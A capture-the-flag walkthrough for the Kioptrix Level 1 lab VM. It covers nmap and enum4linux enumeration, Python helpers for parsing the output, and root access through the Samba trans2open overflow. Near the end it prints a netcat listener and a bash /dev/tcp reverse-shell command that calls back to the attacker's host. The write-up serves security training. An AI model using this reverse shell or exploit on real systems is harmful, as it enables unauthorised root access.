
Kioptrix: Level 1

Description of the challenge


“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any
means possible (except actually hacking the VM server or player). The purpose of these games are to
learn the basic tools and techniques in vulnerability assessment and exploitation. There are more
ways than one to successfully complete the challenges.”

Enumeration

Use netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0

After getting the IP I ran nmap to check the open ports and running services.

nmap -sV 192.168.33.133

(The output below includes OS fingerprinting, NSE script results, a traceroute and all 65535 TCP ports, so the scan that produced it was run with at least -A -p- on top of -sV; a plain -sV scan covers only the default 1000 ports and runs no OS detection or default scripts.)


Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 06:57 EDT
Nmap scan report for 192.168.33.133
Host is up (0.00052s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1026/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: kMYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-05-16T11:00:24+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:D2:DB:A4 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 1m50s, deviation: 0s, median: 1m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.33.133

Post-scan script results:
| clock-skew:
|_  1m50s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.12 seconds
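The scan above carries several findings that are easy to lose in the NSE output: SSHv1 accepted, SSLv2 with 40-bit export suites, a certificate that expired in 2010, TRACE enabled, and a Samba service whose exact version nmap does not print. The Python script below is an added example and not part of the original write-up: it parses nmap's -sV text output into per-port records and applies a few rules to turn them into a finding list. The embedded scan text is a constructed subset of the output above, and the rules (which versions and options to flag) are this example's own choices, not anything nmap reports.

```python
"""Turn nmap -sV/-A text output into a short list of findings.

Added example, not from the original write-up. SAMPLE_SCAN is a constructed
excerpt of the Kioptrix scan on this page; the finding rules are this
example's own choices.
"""
import re
from datetime import datetime, timezone

SAMPLE_SCAN = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_  Potentially risky methods: TRACE
|_Not valid after:  2010-09-26T09:32:06
|   SSLv2 supported
|     SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
"""

# "<port>/<proto>  <state>  <service>  <version...>" as printed by nmap -sV
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line; NSE lines (starting with '|') that follow
    a port line are attached to that port, with the '|', '_' and indent stripped."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def findings(ports, now=None):
    """Apply simple rules to parsed ports; returns (port, message) tuples."""
    now = now or datetime.now(timezone.utc)
    out = []
    for p in ports:
        if p["state"] != "open":
            continue
        ver, scripts = p["version"], "\n".join(p["scripts"])
        if p["service"] == "ssh" and ("protocol 1.99" in ver or "supports SSHv1" in scripts):
            out.append((p["port"], "SSHv1 accepted (protocol downgrade possible)"))
        if "Samba smbd" in ver:
            out.append((p["port"], "Samba exposed; banner hides the version, enumerate it over SMB"))
        if "Potentially risky methods: TRACE" in scripts:
            out.append((p["port"], "HTTP TRACE enabled (cross-site tracing)"))
        if "SSLv2 supported" in scripts:
            out.append((p["port"], "SSLv2 enabled"))
        if "EXPORT40" in scripts:
            out.append((p["port"], "40-bit export cipher suites offered"))
        m = re.search(r"Not valid after:\s+(\S+)", scripts)
        if m:
            exp = datetime.fromisoformat(m.group(1)).replace(tzinfo=timezone.utc)
            if exp < now:
                out.append((p["port"], f"TLS certificate expired on {exp.date()}"))
        m = re.search(r"Apache httpd (\d+)\.(\d+)", ver)
        if m and (int(m.group(1)), int(m.group(2))) < (2, 2):
            out.append((p["port"], f"end-of-life Apache {m.group(1)}.{m.group(2)} branch"))
    return out


if __name__ == "__main__":
    for port, msg in findings(parse_ports(SAMPLE_SCAN)):
        print(f"{port:>5}/tcp  {msg}")
```

The parser keys on the port line layout nmap prints in normal output; for anything beyond a quick triage, run nmap with -oX and read the XML instead, which does not depend on column alignment.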

CHECK FOR SSH PORT 22

Tried to connect over SSH, but it asks for a password. Worth noting on its own: OpenSSH 2.9p2 advertising protocol 1.99 means the server still accepts SSHv1 (nmap's sshv1 script confirms it), so the service is a finding even without credentials.

CHECK FOR PORT 80 AND 443

For Apache on ports 80 and 443 I ran DirBuster to check for hidden directories or pages. Both ports serve the default Red Hat test page. The banner itself is the more interesting result: Apache 1.3.20 with mod_ssl/2.8.4 and OpenSSL/0.9.6b, SSLv2 with 40-bit export ciphers enabled, the TRACE method allowed, and a self-signed certificate that expired in 2010. A mod_ssl/OpenSSL combination this old should also be run through searchsploit, since it is a second possible way in.

CHECK FOR PORT 139

Nmap detected Samba on port 139. I ran nbtscan.

nbtscan 192.168.33.133

Then ran enum4linux to get more details about it.

enum4linux 192.168.33.133

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.33.133
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.33.133 |
======================================================
[+] Got domain/workgroup name: MYGROUP

==============================================
| Nbtstat Information for 192.168.33.133 |
==============================================
Looking up status of 192.168.33.133
KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
MYGROUP         <1d> -         B <ACTIVE>  Master Browser
MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

=======================================
| Session Check on 192.168.33.133 |
=======================================
[+] Server 192.168.33.133 allows sessions using username '', password ''

=============================================
| Getting domain SID for 192.168.33.133 |
=============================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on 192.168.33.133 |
========================================
[+] Got OS info for 192.168.33.133 from smbclient: Domain=[MYGROUP] OS=[Unix]
Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.33.133 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

===============================
| Users on 192.168.33.133 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

===========================================
| Share Enumeration on 192.168.33.133 |
===========================================
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

        Sharename      Type      Comment
        ---------      ----      -------
        IPC$           IPC       IPC Service (Samba Server)
        ADMIN$         IPC       IPC Service (Samba Server)

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------
        MYGROUP              KIOPTRIX
        WORKGROUP            BLADEISM

[+] Attempting to map shares on 192.168.33.133
//192.168.33.133/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.33.133/ADMIN$  [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: NT_STATUS_WRONG_PASSWORD

======================================================
| Password Policy Information for 192.168.33.133 |
======================================================
[E] Unexpected error from polenum:

[+] Attaching to 192.168.33.133 using a NULL share


[+] Trying protocol 445/SMB…

[!] Protocol failed: [Errno 111] Connection refused (192.168.33.133:445)

[+] Trying protocol 139/SMB…

[!] Protocol failed: ('unpack requires a string argument of length 4', "When unpacking field 'representation | <L=0x10 | '\\x00'[:4]'")

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled


Minimum Password Length: 0
================================
| Groups on 192.168.33.133 |
================================

[+] Getting builtin groups:


group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]

[+] Getting builtin group memberships:


Group 'Print Operators' (RID: 550) has member: Couldn't find group Print Operators
Group 'Replicator' (RID: 552) has member: Couldn't find group Replicator
Group 'Account Operators' (RID: 548) has member: Couldn't find group Account Operators
Group 'Power Users' (RID: 547) has member: Couldn't find group Power Users
Group 'Guests' (RID: 546) has member: Couldn't find group Guests
Group 'Administrators' (RID: 544) has member: Couldn't find group Administrators
Group 'Backup Operators' (RID: 551) has member: Couldn't find group Backup Operators
Group 'Users' (RID: 545) has member: Couldn't find group Users
Group 'System Operators' (RID: 549) has member: Couldn't find group System Operators
[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]

[+] Getting local group memberships:

[+] Getting domain groups:


group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]

[+] Getting domain group memberships:


Group 'Domain Users' (RID: 513) has member: Couldn't find group Domain Users
Group 'Domain Admins' (RID: 512) has member: Couldn't find group Domain Admins

 =====================================================================
|    Users on 192.168.33.133 via RID cycling (RIDS: 500-550,1000-1050)    |
 =====================================================================
[I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username '', password ''
S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)

===============================================
| Getting printer info for 192.168.33.133 |
===============================================
No printers returned.
enum4linux complete on Tue May 16 07:48:13 2017
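The RID cycling output above is more readable once you know how Samba 2.2 builds those RIDs: with its default algorithmic mapping a user gets RID 2*uid + 1000 and a group gets RID 2*gid + 1001 (root is 1000, bin uid 1 is 1002, the sys group gid 3 is 1007, squid uid 23 is 1046), while RIDs under 1000 are well-known Windows RIDs such as 512 for Domain Admins. A name of the form unix_user.N or unix_group.N means the uid or gid exists in the mapping but has no entry in /etc/passwd or /etc/group. The practical consequence is that enum4linux's default range 500-550,1000-1050 only reaches uid 25, and on Red Hat of this vintage ordinary user accounts start at uid 500, so a wider range (passed with -r) is needed to find human accounts. The Python below is an added example, not part of the original write-up: it decodes the RIDs, lists the real local users, and computes the RID range for a given uid range. The embedded lines are a constructed subset of the output above.

```python
"""Decode Samba 2.2 algorithmic RIDs from enum4linux RID-cycling output.

Added example, not from the original write-up. Mapping used by Samba 2.2 with
no idmap backend: user RID = 2*uid + 1000, group RID = 2*gid + 1001; RIDs below
1000 are well-known Windows RIDs. SAMPLE is a constructed subset of the
enum4linux output on this page.
"""
import re

SAMPLE = """\
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\\unix_user.25 (Local User)
"""

USER_BASE, GROUP_BASE, MULT = 1000, 1001, 2

# "<domain SID>-<rid> <host>\<name> (Local User|Local Group)"
LINE_RE = re.compile(
    r"^(S-1-5-21-[\d-]+)-(\d+)\s+([^\\\s]+)\\(.+?)\s+\((Local User|Local Group)\)$"
)


def rid_to_account(rid):
    """Map a RID back to ('user', uid) or ('group', gid).
    Even RIDs >= 1000 are users, odd ones are groups; below 1000 is well-known."""
    if rid < USER_BASE:
        return ("well-known", rid)
    if rid % MULT == 0:
        return ("user", (rid - USER_BASE) // MULT)
    return ("group", (rid - GROUP_BASE) // MULT)


def uid_to_rid(uid):
    return USER_BASE + MULT * uid


def gid_to_rid(gid):
    return GROUP_BASE + MULT * gid


def parse_rid_cycle(text):
    """Return one dict per RID-cycling line with the decoded unix id attached."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rid = int(m.group(2))
        kind, ident = rid_to_account(rid)
        rows.append({"rid": rid, "name": m.group(4), "samba_kind": m.group(5),
                     "unix_kind": kind, "id": ident})
    return rows


def local_users(rows):
    """Accounts that really exist in /etc/passwd: Samba-side 'Local User' entries
    whose name is not the unix_user.N placeholder for an unassigned uid."""
    return [r for r in rows
            if r["samba_kind"] == "Local User" and not r["name"].startswith("unix_user.")]


def rid_range_for_uids(lo, hi):
    """The -r argument for enum4linux so that cycling covers uids lo..hi inclusive
    (the +1 also takes in the group RID that follows the last user RID)."""
    return f"{uid_to_rid(lo)}-{uid_to_rid(hi) + 1}"


if __name__ == "__main__":
    for r in local_users(parse_rid_cycle(SAMPLE)):
        print(f"rid {r['rid']}  uid {r['id']:<4} {r['name']}")
    print("to reach uids 500-600 use: -r", rid_range_for_uids(500, 600))
```

Running it against the full output above gives root, bin, daemon, adm, lp, sync, shutdown, halt, mail, news, uucp, operator, games, gopher, ftp and squid, all system accounts; the absence of anything at uid 500 or above within the scanned range is exactly why a second pass with -r 2000-2201 is worth the few seconds it costs.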

Exploitation

Googled Samba 2.2.1a and found an exploit.

https://www.exploit-db.com/exploits/10/

This is eSDee's trans2open remote buffer overflow (CVE-2003-0201), which affects Samba 2.2.0 through 2.2.8 and was fixed in 2.2.8a, so 2.2.1a is squarely in range. smbd runs as root, so a successful overflow gives a root shell directly; no privilege escalation step is needed afterwards. The exploit has a bruteforce mode that walks candidate return addresses, so it can take a number of attempts, and each failed attempt crashes that smbd child process. That is fine on a lab box, but it is not something to run blind against a production host.

I downloaded the exploit using wget.

Compile and run. The source is plain C from 2003 and builds with gcc (expect warnings on a modern compiler); run it in its Linux bruteforce mode (option -b 0, with -v for progress) and the target as the last argument. The shell it returns is tied to the exploit's own connection and is not a proper tty, so the next step is to call back to a clean listener on the attacking machine (192.168.33.129 here).

Started a netcat listener at port 4444.

nc -nlvp 4444

Then, from the shell the exploit gave, use this command to connect back to our attacking box.

bash -i >& /dev/tcp/192.168.33.129/4444 0>&1

Reading the redirections: bash opens a TCP connection to 192.168.33.129:4444 through its /dev/tcp pseudo-device, >& sends both stdout and stderr to that socket, and 0>&1 makes stdin read from the same socket, so whatever is typed into the netcat listener is executed by the interactive (-i) bash on the target. Confirm the result with id or whoami; root is the goal of the challenge.

End…….
